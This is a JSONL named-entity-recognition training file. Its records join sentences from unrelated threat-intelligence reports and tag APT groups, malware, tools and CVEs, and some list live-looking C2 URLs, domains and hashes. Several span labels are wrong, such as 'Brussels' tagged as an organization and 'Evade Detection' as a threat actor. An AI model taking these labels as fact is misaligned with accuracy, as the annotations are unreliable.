{"text": "While details would vary , all of the identified copies of this spyware shared a similar disguise . The payload embedded within the ISMInjector sample delivered in this attack is a variant of the ISMAgent backdoor that we had discussed in detail in our blog discussing a targeted attack on a Saudi Arabian technology company . Finally , the RAT is able to download files encoded in base64 on Google Drive . [ As the documentary points out , the domain AshleyMadisonSucks.com was eventually transferred to Ashley Madison , which then shrewdly used it for advertising and to help debunk theories about why its service was supposedly untrustworthy ] .", "spans": {"TOOL: ISMInjector sample": [[132, 150]], "TOOL: ISMAgent backdoor": [[196, 213]], "ORGANIZATION: technology company": [[306, 324]], "TOOL: RAT": [[341, 344]], "TOOL: Google Drive": [[392, 404]]}, "info": {"id": "cyberner_stix_train_006665", "source": "cyberner_stix_train"}}
{"text": "Hunter queried the following URIs in a specific order to determine if the associated software configurations are insecure .", "spans": {"TOOL: Hunter": [[0, 6]]}, "info": {"id": "cyberner_stix_train_006666", "source": "cyberner_stix_train"}}
{"text": "As part of our investigation into this malware , we emulated an infected Android device in order to communicate with the RuMMS C2 server . Unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals . The dropped sample is an SFX archive , like the tradition of Gamaredon implants . Last month , NoEscape posted 7 victims on their leak site .", "spans": {"SYSTEM: Android": [[73, 80]], "MALWARE: RuMMS": [[121, 126]], "THREAT_ACTOR: activity groups": [[151, 166]], "ORGANIZATION: economic": [[225, 233]], "THREAT_ACTOR: PROMETHIUM": [[246, 256]], "THREAT_ACTOR: NEODYMIUM": [[261, 270]], "TOOL: SFX archive": [[380, 391]], "THREAT_ACTOR: Gamaredon": [[416, 425]], "MALWARE: NoEscape": [[450, 458]]}, "info": {"id": "cyberner_stix_train_006667", "source": "cyberner_stix_train"}}
{"text": "Xpert RAT reportedly first appeared in 2011 . Bellingcat also reported the domain had been used previously to host potential decoy documents as detailed in VirusTotal here using http://voguextra.com/decoy.doc .", "spans": {"MALWARE: Xpert RAT": [[0, 9]], "ORGANIZATION: Bellingcat": [[46, 56]], "FILEPATH: decoy documents": [[125, 140]], "TOOL: VirusTotal": [[156, 166]], "FILEPATH: http://voguextra.com/decoy.doc": [[178, 208]]}, "info": {"id": "cyberner_stix_train_006668", "source": "cyberner_stix_train"}}
{"text": "Network Security appliances such as Next-Generation Firewall ( NGFW ) , Next-Generation Intrusion Prevention System ( NGIPS ) , and Meraki MX can detect malicious activity associated with this threat . Cisco Talos assesses with moderate confidence that a campaign we recently discovered called \" BlackWater \" is associated with suspected persistent threat actor MuddyWater . MOF files are compiled scripts that describe Common Information Model ( CIM ) classes , which are compiled into the WMI repository . Given that threat actors use red team tools and public exploitation frameworks for targeted threat activity in the wild , we believe COSMICENERGY poses a plausible threat to affected electric grid assets .", "spans": {"SYSTEM: Next-Generation Firewall": [[36, 60]], "SYSTEM: Next-Generation Intrusion Prevention System": [[72, 115]], "SYSTEM: Meraki MX": [[132, 141]], "ORGANIZATION: Cisco Talos": [[202, 213]], "THREAT_ACTOR: threat actor MuddyWater": [[349, 372]], "TOOL: MOF files": [[375, 384]], "TOOL: Common Information Model": [[420, 444]], "TOOL: CIM": [[447, 450]], "TOOL: WMI": [[491, 494]], "THREAT_ACTOR: threat actors": [[519, 532]], "TOOL: red team tools": [[537, 551]], "MALWARE: COSMICENERGY": [[641, 653]], "SYSTEM: electric grid assets": [[691, 711]]}, "info": {"id": "cyberner_stix_train_006669", "source": "cyberner_stix_train"}}
{"text": "After connecting to its C2 server , RCSession checks in with an encrypted beacon and then awaits instruction .", "spans": {"TOOL: C2": [[24, 26]], "MALWARE: RCSession": [[36, 45]]}, "info": {"id": "cyberner_stix_train_006670", "source": "cyberner_stix_train"}}
{"text": "While the counterfeit games claim to provide similar functionality to the popular apps , they are simply used to display ads through a custom advertisement SDK . To conduct targeted attacks , MoneyTaker use a distributed infrastructure that is difficult to track . Table 2 lists the ELMER backdoors observed during the December campaigns . Our recent reporting states that these operations are very likely aimed at stealing information and gaining persistent remote access .", "spans": {"THREAT_ACTOR: MoneyTaker": [[192, 202]], "TOOL: distributed infrastructure": [[209, 235]], "MALWARE: ELMER backdoors": [[283, 298]]}, "info": {"id": "cyberner_stix_train_006671", "source": "cyberner_stix_train"}}
{"text": "It reinforces the need for comprehensive defense powered by broad visibility into attack surfaces as well as domain experts who track the threat landscape and uncover notable threats that might be hiding amidst massive threat data and signals . it is a typical first stage backdoor commonly found in APT attacks . This provides researchers and analyst broad tool to attack this type of obfuscation , We note that the MicroSCADA control system became a Hitachi Energy product in 2022 after a divestiture from ABB .", "spans": {"SYSTEM: MicroSCADA": [[417, 427]], "ORGANIZATION: Hitachi Energy product": [[452, 474]], "ORGANIZATION: ABB": [[508, 511]]}, "info": {"id": "cyberner_stix_train_006672", "source": "cyberner_stix_train"}}
{"text": "Royal Mail - British postal service and courier company . Based on this information , it is possible that upon the exposure of the Nasr Institute as a front for Iranian state-sponsored offensive cyber activity , employees transitioned over to other entities , such as Kavosh , to protect their identities and minimize further exposure . In one remarkable case , the Carbanak 2.0 gang used its access to a financial institution that stores information about shareholders to change the ownership details of a large company .", "spans": {"ORGANIZATION: Royal Mail": [[0, 10]], "THREAT_ACTOR: Nasr": [[131, 135]], "MALWARE: Carbanak": [[366, 374]], "ORGANIZATION: financial institution": [[405, 426]]}, "info": {"id": "cyberner_stix_train_006673", "source": "cyberner_stix_train"}}
{"text": "PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . However , to increase success rates APT20 can use zero-day exploits , so even a properly patched system would be compromised .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "ORGANIZATION: specific individuals": [[82, 102]], "VULNERABILITY: zero-day exploits": [[143, 160]], "THREAT_ACTOR: APT20": [[238, 243]], "VULNERABILITY: zero-day": [[252, 260]]}, "info": {"id": "cyberner_stix_train_006674", "source": "cyberner_stix_train"}}
{"text": "On top of our analysis of recent trends , M-Trends 2017 contains insights from our FireEye as a Service (FaaS) teams for the second consecutive year . APT33 sent spear phishing emails to employees whose jobs related to the aviation industry .", "spans": {"ORGANIZATION: M-Trends": [[42, 50]], "ORGANIZATION: FireEye": [[83, 90]], "THREAT_ACTOR: APT33": [[151, 156]], "TOOL: emails": [[177, 183]], "ORGANIZATION: employees": [[187, 196]], "ORGANIZATION: aviation industry": [[223, 240]]}, "info": {"id": "cyberner_stix_train_006675", "source": "cyberner_stix_train"}}
{"text": "Several of the main components of RuMMS are shown in Figure 2 . In these websites they hosted malware that was digitally signed with a valid , likely stolen code signing certificate . As visible in the previous figure , the only difference between the files are in the variable , registry key and path used by Word rather than by Excel . All of these things point to threat actors and groups like Winnti will continue to try different methods of attack .", "spans": {"MALWARE: RuMMS": [[34, 39]], "TOOL: stolen code signing certificate": [[150, 181]], "TOOL: Excel": [[328, 333]], "THREAT_ACTOR: threat actors": [[365, 378]], "THREAT_ACTOR: Winnti": [[395, 401]]}, "info": {"id": "cyberner_stix_train_006676", "source": "cyberner_stix_train"}}
{"text": "Here is an approximate diagram of the opcode data structure : Figure 5 . The Lotus Blossom actors using Emissary have been active for at least seven years in Southeast Asia . If for a particular reason you need them , reach out to us at threatintel@eset.com . Also , ideology as a motivator could mean your group is the target of nation states .", "spans": {"THREAT_ACTOR: Lotus Blossom actors": [[77, 97]], "TOOL: Emissary": [[104, 112]], "ORGANIZATION: group": [[307, 312]], "ORGANIZATION: nation states": [[330, 343]]}, "info": {"id": "cyberner_stix_train_006677", "source": "cyberner_stix_train"}}
{"text": "Secureworks researchers investigated activities associated with the BRONZE BUTLER (also known as Tick) threat group , which likely originates in the People . To learn more about this campaign , you may refer to our report , Operation Pawn Storm Using Decoys to Evade Detection . Additionally , we discovered a new DNS hijacking technique that we assess with moderate confidence is connected to the actors behind Sea Turtle . Talos now has moderate confidence that the threat actors behind Sea Turtle have been using another DNS hijacking technique . This technique was also observed against a government organizations in the Middle East and North African region . Cisco telemetry confirmed that the actors behind Sea Turtle maintained access to the ICS-Forth network from an operational command and control (C2) node . Our telemetry indicates that the actors maintained access in the ICS-Forth network through at least April 24 , five days after the statement was publicly released . This full-blown spying framework consists of two packages named ‘Tokyo’ and ‘Yokohama’ . Just to highlight its capabilities , TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue . The first confirmed date when TajMahal samples were seen on a victim’s machine is August 2014 . More details about TajMahal are available to customers of the Kaspersky Intelligence Reporting service .", "spans": {"ORGANIZATION: Secureworks": [[0, 11]], "THREAT_ACTOR: BRONZE BUTLER": [[68, 81]], "THREAT_ACTOR: Evade Detection": [[261, 276]], "THREAT_ACTOR: actors": [[398, 404], [852, 858]], "ORGANIZATION: Talos": [[425, 430]], "ORGANIZATION: Cisco": [[664, 669]], "MALWARE: control (C2)": [[799, 811]], "FILEPATH: ‘Tokyo’": [[1048, 1055]], "FILEPATH: ‘Yokohama’": [[1060, 1070]], "FILEPATH: TajMahal": [[1110, 1118], [1235, 1243], [1320, 1328]], "ORGANIZATION: Kaspersky": [[1363, 1372]]}, "info": {"id": "cyberner_stix_train_006679", "source": "cyberner_stix_train"}}
{"text": "1 . Bemstour exploits two Windows vulnerabilities in order to achieve remote kernel code execution on targeted computers . We believe APT34 is involved in a long-term Cyber Espionage operation largely focused on reconnaissance efforts to benefit Iranian nation-state interests and has been operational since at least 2014 .", "spans": {"THREAT_ACTOR: Bemstour": [[4, 12]], "VULNERABILITY: vulnerabilities": [[34, 49]], "THREAT_ACTOR: APT34": [[134, 139]]}, "info": {"id": "cyberner_stix_train_006680", "source": "cyberner_stix_train"}}
{"text": "Some are carried out well , others , like WolfRAT , are designed with an overload of functionality in mind as opposed to factoring any sensible approach to the development aspect . Trochilus was first reported by Arbor Networks in their Seven Pointed Dagger report tying its use to other targeted Southeast Asia activity . APT12 has the ability to adapt quickly to public exposures with new tools , tactics , and procedures ( TTPs ) . Now , there is a potential new competitor in the \" fake updates \" landscape that looks strangely familiar .", "spans": {"MALWARE: WolfRAT": [[42, 49]], "TOOL: Trochilus": [[181, 190]], "ORGANIZATION: Arbor Networks": [[213, 227]], "THREAT_ACTOR: APT12": [[323, 328]]}, "info": {"id": "cyberner_stix_train_006681", "source": "cyberner_stix_train"}}
{"text": "To do this the attackers used a signed credential-dumping tool to obtain the victim 's account credentials .", "spans": {}, "info": {"id": "cyberner_stix_train_006682", "source": "cyberner_stix_train"}}
{"text": "The malicious document – Hotel_Reservation_Form.doc ( MD5 : 9b10685b774a783eabfecdb6119a8aa3 ) , contains a macro that base64 decodes a dropper that then deploys APT28 ’s signature GAMEFISH malware ( MD5 : 1421419d1be31f1f9ea60e8ed87277db ) , which uses mvband.net and mvtband.net as command and control ( C2 ) domains .", "spans": {"FILEPATH: Hotel_Reservation_Form.doc": [[25, 51]], "FILEPATH: 9b10685b774a783eabfecdb6119a8aa3": [[60, 92]], "TOOL: macro": [[108, 113]], "THREAT_ACTOR: APT28": [[162, 167]], "MALWARE: GAMEFISH": [[181, 189]], "FILEPATH: 1421419d1be31f1f9ea60e8ed87277db": [[206, 238]], "DOMAIN: mvband.net": [[254, 264]], "DOMAIN: mvtband.net": [[269, 280]], "TOOL: command and control": [[284, 303]], "TOOL: C2": [[306, 308]]}, "info": {"id": "cyberner_stix_train_006683", "source": "cyberner_stix_train"}}
{"text": "The small or limited number is understandable given the nature of this campaign , but we also expect it to increase or even diversify in terms of distribution . We will publish more details about the attack once Adobe patches the vulnerability , which should be on June 16 . Attackers make mistakes , and FIN7 are no exception . This makes Greatness particularly well - suited for phishing business users .", "spans": {"THREAT_ACTOR: FIN7": [[305, 309]], "THREAT_ACTOR: phishing business users": [[381, 404]]}, "info": {"id": "cyberner_stix_train_006684", "source": "cyberner_stix_train"}}
{"text": "On Nov14 , 2017 , FireEye observed APT34 using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . The first of which we call ' CONFUCIUS_A ' , a malware family that has links to a series of attacks associated with a backdoor attack method commonly known as SNEEPY ( aka ByeByeShell ) first reported by Rapid7 in 2013 .", "spans": {"ORGANIZATION: FireEye": [[18, 25]], "THREAT_ACTOR: APT34": [[35, 40]], "VULNERABILITY: vulnerability": [[83, 96]], "ORGANIZATION: government organization": [[109, 132]], "FILEPATH: CONFUCIUS_A": [[183, 194]], "MALWARE: SNEEPY": [[313, 319]], "MALWARE: ByeByeShell": [[326, 337]], "ORGANIZATION: Rapid7": [[358, 364]]}, "info": {"id": "cyberner_stix_train_006685", "source": "cyberner_stix_train"}}
{"text": "A complete list of hashes can be found here . OutExtra.exe is a signed legitimate application from Microsoft named finder.exe . APT16 is a China based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations .", "spans": {"MALWARE: OutExtra.exe": [[46, 58]], "MALWARE: finder.exe": [[115, 125]], "THREAT_ACTOR: APT16": [[128, 133]]}, "info": {"id": "cyberner_stix_train_006686", "source": "cyberner_stix_train"}}
{"text": "The Trojan download window Asacub masquerades under the guise of an MMS app or a client of a popular free ads service . Incident response engagements have given CTU researchers insight into the tactics TG-3390 employs during intrusions . In a previous execution ( published in June 2019 ) , we observed that dota2 had its own folder but it was hardly executed , indicating that this version is the updated iteration . A rough translation of this message is as follows : Hack520 seems to be very interested in hosting services and his profile fits that of a system administrator profile with some programming and hacking skills .", "spans": {"MALWARE: Asacub": [[27, 33]], "ORGANIZATION: CTU": [[161, 164]], "THREAT_ACTOR: TG-3390": [[202, 209]], "TOOL: dota2": [[308, 313]], "THREAT_ACTOR: Hack520": [[470, 477]]}, "info": {"id": "cyberner_stix_train_006687", "source": "cyberner_stix_train"}}
{"text": "As of this publication , BRONZE UNION remains a formidable threat group that targets intellectual property and executes its operations at a swift pace . This seems confusing as FireEye earlier publicly declared the TRITON as a discrete entity , linked to a Russian research institution , and christened it as \" TEMP.Veles \" .", "spans": {"ORGANIZATION: FireEye": [[177, 184]], "MALWARE: TRITON": [[215, 221]], "ORGANIZATION: research institution": [[265, 285]], "THREAT_ACTOR: TEMP.Veles": [[311, 321]]}, "info": {"id": "cyberner_stix_train_006688", "source": "cyberner_stix_train"}}
{"text": "As MoleRATs most prominently targets Palestinian territories , its spear phishing attacks often use attached malicious documents on topical Palestinian Authority-related issues to lure their victims .", "spans": {"THREAT_ACTOR: MoleRATs": [[3, 11]]}, "info": {"id": "cyberner_stix_train_006689", "source": "cyberner_stix_train"}}
{"text": "The Zen trojan After achieving persistence , the trojan downloads additional payloads , including another trojan called Zen . Attacks on the chemical industry are merely their latest attack wave . ELMER : CVE-2015-1701 . Adversaries may manipulate physical process control within the industrial environment .", "spans": {"MALWARE: Zen": [[4, 7], [120, 123]], "ORGANIZATION: chemical industry": [[141, 158]], "MALWARE: ELMER": [[197, 202]], "VULNERABILITY: CVE-2015-1701": [[205, 218]], "THREAT_ACTOR: Adversaries": [[221, 232]]}, "info": {"id": "cyberner_stix_train_006690", "source": "cyberner_stix_train"}}
{"text": "Report_URL : https://dragos.com/resource/xenotime/", "spans": {}, "info": {"id": "cyberner_stix_train_006691", "source": "cyberner_stix_train"}}
{"text": "Such a diversity of protocols gives the attackers more flexible control . NewsBeef continues to deploy malicious macro-enabled Office documents , poisoned legitimate Flash and Chrome installers , PowerSploit , and Pupy tools . The group 's victims have primarily been in the Middle East , Europe , and the United States .", "spans": {"THREAT_ACTOR: NewsBeef": [[74, 82]], "TOOL: Flash": [[166, 171]], "TOOL: Chrome installers": [[176, 193]], "TOOL: PowerSploit": [[196, 207]], "TOOL: Pupy tools": [[214, 224]]}, "info": {"id": "cyberner_stix_train_006692", "source": "cyberner_stix_train"}}
{"text": "ESET researchers and colleagues from other companies have documented these components ; however , in this article we will focus on what ’s beyond the compromise , what the operators do once a victim system is running a Zebrocy Delphi backdoor .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "MALWARE: Zebrocy": [[219, 226]], "TOOL: Delphi": [[227, 233]]}, "info": {"id": "cyberner_stix_train_006693", "source": "cyberner_stix_train"}}
{"text": "Microsoft Defender for Endpoint on Android , now generally available , extends Microsoft ’ s industry-leading endpoint protection to Android . The attackers have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors . and if it adopted in other families . Actors behind many of these new ransomware variants , including Sirattacker , Chaos 2.0 , Chaos 4.0 , DCrypt , and Shadow Men Team , are demanding payments ranging from USD $ 3.50 to $ 4,390 in Bitcoin from victims .", "spans": {"SYSTEM: Microsoft Defender": [[0, 18]], "SYSTEM: Android": [[35, 42], [133, 140]], "ORGANIZATION: Microsoft": [[79, 88]], "THREAT_ACTOR: attackers": [[147, 156]], "ORGANIZATION: aerospace": [[241, 250]], "ORGANIZATION: energy": [[253, 259]], "ORGANIZATION: government": [[262, 272]], "ORGANIZATION: high-tech": [[275, 284]], "ORGANIZATION: consulting services": [[287, 306]], "ORGANIZATION: chemicals": [[313, 322]], "ORGANIZATION: manufacturing": [[325, 338]], "ORGANIZATION: mining sectors": [[341, 355]], "THREAT_ACTOR: Sirattacker": [[460, 471]], "THREAT_ACTOR: Chaos 2.0 ,": [[474, 485]], "THREAT_ACTOR: Chaos 4.0": [[486, 495]], "THREAT_ACTOR: DCrypt": [[498, 504]], "THREAT_ACTOR: Shadow Men Team": [[511, 526]]}, "info": {"id": "cyberner_stix_train_006694", "source": "cyberner_stix_train"}}
{"text": "Further analysis of both malware revealed that their main targets are very similar , as seen in the screenshot below .", "spans": {"MALWARE: malware": [[25, 32]]}, "info": {"id": "cyberner_stix_train_006695", "source": "cyberner_stix_train"}}
{"text": "While examining 25f0d1cbcc53d8cfd6d848e12895ce376fbbfaf279be591774b28f70852a4fd8 , we were able to pivot from its C2", "spans": {"FILEPATH: 25f0d1cbcc53d8cfd6d848e12895ce376fbbfaf279be591774b28f70852a4fd8": [[16, 80]], "TOOL: C2": [[114, 116]]}, "info": {"id": "cyberner_stix_train_006696", "source": "cyberner_stix_train"}}
{"text": "Windows Defender ATP displays these activities as process trees in a machine timeline for the infected computer .", "spans": {"TOOL: Windows Defender ATP": [[0, 20]]}, "info": {"id": "cyberner_stix_train_006697", "source": "cyberner_stix_train"}}
{"text": "The configuration contains a list of steps to execute with URLs and JavaScript . We have not found evidence of Bahamut engaging in crime or operating outside its limited geographic domains , although this narrow perspective could be accounted for by its compartmentalization of operations . Finally it spawns 2 system threads . I will use Qiling in the emulation .", "spans": {"THREAT_ACTOR: Bahamut": [[111, 118]], "TOOL: Qiling": [[339, 345]]}, "info": {"id": "cyberner_stix_train_006698", "source": "cyberner_stix_train"}}
{"text": "Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control . Execute a command through exploits for CVE-2017-11882 .", "spans": {"VULNERABILITY: CVE-2017-11882": [[66, 80], [324, 338]], "MALWARE: 'NavShExt.dll'": [[147, 161]], "MALWARE: iexplore.exe": [[192, 204]]}, "info": {"id": "cyberner_stix_train_006699", "source": "cyberner_stix_train"}}
{"text": "X-Force IRIS researchers had been tracking earlier activity associated with similar malicious , PowerShell-laden documents themed as resumes and human resources documents , some of which related to organizations in Saudi Arabia .", "spans": {"ORGANIZATION: X-Force IRIS": [[0, 12]]}, "info": {"id": "cyberner_stix_train_006700", "source": "cyberner_stix_train"}}
{"text": "Orangeworm 's secondary targets include Manufacturing , Information Technology , Agriculture , and Logistics . We are also grateful to the Private Office of his Holiness the Dalai Lama , the Tibetan Government-in-Exile , the missions of Tibet in London , Brussels , and New York , and Drewla ( a Tibetan NGO ) .", "spans": {"ORGANIZATION: Manufacturing": [[40, 53]], "ORGANIZATION: Information Technology": [[56, 78]], "ORGANIZATION: Agriculture": [[81, 92]], "ORGANIZATION: Logistics": [[99, 108]], "ORGANIZATION: Tibet": [[237, 242]], "ORGANIZATION: Brussels": [[255, 263]], "ORGANIZATION: Drewla": [[285, 291]], "ORGANIZATION: Tibetan": [[296, 303]], "ORGANIZATION: NGO": [[304, 307]]}, "info": {"id": "cyberner_stix_train_006701", "source": "cyberner_stix_train"}}
{"text": "In 2018 , the most actively distributed versions were 5.0.0 and 5.0.3 . CTU researchers have evidence that the TG-3390 compromised U.S and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations . Comparing this development to their previous attacks , we think Outlaw may be aiming to go after enterprises that have yet to update their systems , assessing security and changes with their previously infected hosts , finding new and old targets , and possibly testing their updates in the wild . None Read about adversaries tracked by CrowdStrike in 2021 in the and in the • None Learn more about how can help your organization prepare to defend against sophisticated threats , respond and recover from incidents with speed and precision , and fortify your cybersecurity practices .", "spans": {"ORGANIZATION: CTU": [[72, 75]], "THREAT_ACTOR: TG-3390": [[111, 118]], "ORGANIZATION: manufacturing": [[185, 198]], "ORGANIZATION: aerospace": [[214, 223]], "ORGANIZATION: defense contractors": [[236, 255]], "ORGANIZATION: automotive": [[260, 270]], "ORGANIZATION: technology": [[273, 283]], "ORGANIZATION: energy": [[286, 292]], "ORGANIZATION: pharmaceuticals": [[299, 314]], "ORGANIZATION: education": [[319, 328]], "ORGANIZATION: legal": [[335, 340]], "THREAT_ACTOR: Outlaw": [[469, 475]], "ORGANIZATION: CrowdStrike": [[742, 753]]}, "info": {"id": "cyberner_stix_train_006702", "source": "cyberner_stix_train"}}
{"text": "Its creators reduced the app ’ s malicious surface to the bare minimum by removing all potentially malicious functionalities but one : abusing Accessibility Service . It used GitHub and Slack as tools for communication between the malware and its controller . In terms of form factor , PapaAlfa comes in two flavors : service DLL and standalone executable .", "spans": {"THREAT_ACTOR: It": [[167, 169]], "TOOL: GitHub": [[175, 181]], "TOOL: Slack": [[186, 191]], "MALWARE: PapaAlfa": [[286, 294]], "MALWARE: service DLL": [[318, 329]], "MALWARE: standalone executable": [[334, 355]]}, "info": {"id": "cyberner_stix_train_006703", "source": "cyberner_stix_train"}}
{"text": "COZYDUKE : First known activity January 2010 , Most recent known activity : Spring 2015 , Other names CozyBear , CozyCar , Cozer , EuroAPT , C&C communication methods HTTP(S) , Twitter ( backup ) , Known toolset components Dropper , Modular backdoor , Multiple persistence components , Information gathering module , Screenshot module , Password stealing module , Password hash stealing module .", "spans": {"MALWARE: COZYDUKE": [[0, 8]], "MALWARE: CozyBear": [[102, 110]], "MALWARE: CozyCar": [[113, 120]], "MALWARE: Cozer": [[123, 128]], "MALWARE: EuroAPT": [[131, 138]], "TOOL: C&C": [[141, 144]], "TOOL: Twitter": [[177, 184]], "TOOL: Dropper": [[223, 230]], "TOOL: Modular": [[233, 240]]}, "info": {"id": "cyberner_stix_train_006704", "source": "cyberner_stix_train"}}
{"text": "WannaCry appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD ( via Bitcoin ) to decrypt the data . After the infection stage , criminals move laterally with the help of legitimate and pentesting tools , stealing passwords from their initial victims ( entry point ) to gain access to the computers within the organization that have access to money transactions .", "spans": {"TOOL: WannaCry": [[0, 8]], "MALWARE: .WCRY": [[47, 52]]}, "info": {"id": "cyberner_stix_train_006705", "source": "cyberner_stix_train"}}
{"text": "The dropped file was analyzed in an isolated environment ( without actually allowing it to connect to the c2 server ) .", "spans": {"TOOL: dropped file": [[4, 16]], "TOOL: c2": [[106, 108]]}, "info": {"id": "cyberner_stix_train_006706", "source": "cyberner_stix_train"}}
{"text": "Since in Android 8.0 ( SDK API 26 ) the system is able to kill idle services , this code raises a fake update notification to prevent it : Cybercriminals have the ability to control the implant via HTTP , XMPP , binary SMS and FirebaseCloudMessaging ( or GoogleCloudMessaging in older versions ) protocols . The NewsBeef actor deployed a new toolset in a campaign that focused primarily on Saudi Arabian targets . Molerats is a politically-motivated threat group that has been operating since 2012 .", "spans": {"SYSTEM: Android 8.0": [[9, 20]], "THREAT_ACTOR: NewsBeef": [[312, 320]], "THREAT_ACTOR: Molerats": [[414, 422]]}, "info": {"id": "cyberner_stix_train_006707", "source": "cyberner_stix_train"}}
{"text": "The following are tools that TEMP.Periscope has leveraged in past operations and could use again , though these have not been seen in the current wave of activity:Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform , commonly used for pen-testing network environments . This malware family can be used to compromise multiple vendor platforms and leverages uncommon technology to access physical devices .", "spans": {"THREAT_ACTOR: TEMP.Periscope": [[29, 43]], "THREAT_ACTOR: Cobalt Strike": [[228, 241]], "FILEPATH: malware": [[320, 327]]}, "info": {"id": "cyberner_stix_train_006708", "source": "cyberner_stix_train"}}
{"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . While PLEAD and KIVARS are most likely to be used in first phase attacks , Waterbear can be seen as a secondary backdoor installed after attackers have gained a certain level of privilege .", "spans": {"MALWARE: files": [[4, 9]], "VULNERABILITY: Microsoft Office vulnerability": [[33, 63]], "VULNERABILITY: CVE-2012-0158": [[66, 79]], "MALWARE: PLEAD": [[165, 170]], "MALWARE: KIVARS": [[175, 181]]}, "info": {"id": "cyberner_stix_train_006709", "source": "cyberner_stix_train"}}
{"text": "The tools and techniques used throughout these attacks are consistent with several Chinese threat actors , such as APT10 , a threat actor believed to operate on behalf of the Chinese Ministry of State Security . Later that month , the same tactics and patterns were seen in attempts against an Iranian women 's activist – an individual commonly targeted by Iranian actors , such as Charming Kitten and the Sima campaign documented in our 2016 Black Hat talk .", "spans": {"THREAT_ACTOR: threat actors": [[91, 104]], "THREAT_ACTOR: APT10": [[115, 120]], "THREAT_ACTOR: threat actor": [[125, 137]], "ORGANIZATION: Iranian women 's activist": [[294, 319]], "ORGANIZATION: individual": [[325, 335]]}, "info": {"id": "cyberner_stix_train_006710", "source": "cyberner_stix_train"}}
{"text": "Although tracking threats like Winnti involves old-fashioned investigative work , Microsoft Threat Intelligence analysts take advantage of machine learning to work at scale .", "spans": {"MALWARE: Winnti": [[31, 37]], "TOOL: machine learning": [[139, 155]]}, "info": {"id": "cyberner_stix_train_006711", "source": "cyberner_stix_train"}}
{"text": "Interestingly , early “ clean ” versions contain varying levels of signals that the updates will include malicious code later . While not detected at the time , Microsoft 's antivirus and security products now detect this Barium malicious file and flag the file as \" Win32/ShadowPad.A \" . There are some built in functions on the side for the more common features . The sample of LIGHTWORK we obtained includes eight hardcoded IEC-104 information object addresses ( IOA ) , which typically correlate with input or output data elements on a device and may correspond to power line switches or circuit breakers in an RTU or relay configuration .", "spans": {"ORGANIZATION: Microsoft": [[161, 170]], "THREAT_ACTOR: Barium": [[222, 228]], "MALWARE: Win32/ShadowPad.A": [[267, 284]], "TOOL: LIGHTWORK": [[380, 389]]}, "info": {"id": "cyberner_stix_train_006712", "source": "cyberner_stix_train"}}
{"text": "It will check the version of Android installed and decide which library should be patched . This threat is another proof point that attackers are clearly incorporating the mobile device into their surveillance campaigns as a primary attack vector . RevengeHotels is a campaign that has been active since at least 2015 , revealing different groups using traditional RAT malware to infect businesses in the hospitality sector . ItaDuke because it reminded us of Duqu and because of the ancient Italian comments in the shellcode copied from Dante Alighieri - s ? Divine Comedy .", "spans": {"SYSTEM: Android": [[29, 36]], "TOOL: mobile device": [[172, 185]], "THREAT_ACTOR: RevengeHotels": [[249, 262]], "MALWARE: RAT": [[365, 368]], "MALWARE: ItaDuke": [[426, 433]], "MALWARE: Duqu": [[460, 464]], "ORGANIZATION: Dante Alighieri": [[538, 553]], "ORGANIZATION: Divine Comedy": [[560, 573]]}, "info": {"id": "cyberner_stix_train_006713", "source": "cyberner_stix_train"}}
{"text": "To provide context around such alerts , Windows Defender ATP also features a short summary of the group ’s history , goals , methods , and tools , with links to extensive documentation for technically minded users .", "spans": {"TOOL: Windows Defender ATP": [[40, 60]]}, "info": {"id": "cyberner_stix_train_006714", "source": "cyberner_stix_train"}}
{"text": "In over half of the targeted threat response engagements performed by the Dell SecureWorks Counter Threat Unit Special Operations ( CTU-SO ) team in the past year , the threat actors accessed the target environment using compromised credentials and the companies' own virtual private network ( VPN ) or other remote access solutions .", "spans": {"ORGANIZATION: Dell SecureWorks Counter Threat Unit Special Operations": [[74, 129]], "ORGANIZATION: CTU-SO": [[132, 138]], "TOOL: virtual private network": [[268, 291]], "TOOL: VPN": [[294, 297]]}, "info": {"id": "cyberner_stix_train_006715", "source": "cyberner_stix_train"}}
{"text": "The developer of this particular payload configured it to use the following URL to communicate with as its C2 : http://188.241.58.170/local/s3/filters.php .", "spans": {"TOOL: C2": [[107, 109]], "FILEPATH: http://188.241.58.170/local/s3/filters.php": [[112, 154]]}, "info": {"id": "cyberner_stix_train_006716", "source": "cyberner_stix_train"}}
{"text": "Trojan anatomy The family was named Riltok after the librealtalk-jni.so library contained in the APK file of the Trojan . McAfee concludes that some groups—and especially the Poetry Group —have shifted tactics to use Citadel in ways other than what it was originally intended for . The .dll file is executed by the .exe file .", "spans": {"MALWARE: Riltok": [[36, 42]], "ORGANIZATION: McAfee": [[122, 128]], "THREAT_ACTOR: Group": [[182, 187]], "FILEPATH: .dll": [[286, 290]], "FILEPATH: .exe": [[315, 319]]}, "info": {"id": "cyberner_stix_train_006717", "source": "cyberner_stix_train"}}
